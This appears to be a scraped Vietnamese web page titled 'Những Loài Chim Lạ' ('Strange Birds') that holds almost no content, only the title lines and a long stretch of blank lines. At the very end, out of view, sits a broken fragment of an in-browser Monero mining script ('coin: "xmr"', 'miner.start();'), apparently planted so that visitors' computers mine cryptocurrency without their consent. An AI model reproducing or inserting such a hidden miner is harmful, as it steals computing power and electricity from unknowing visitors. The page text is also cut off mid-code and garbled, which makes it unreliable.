Những Loài Chim Lạ - Trần Thị Bạch Mai sưu tầm -

         Strange Birds  
                            Những Loài Chim Lạ
                               Những loài chim lạ.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();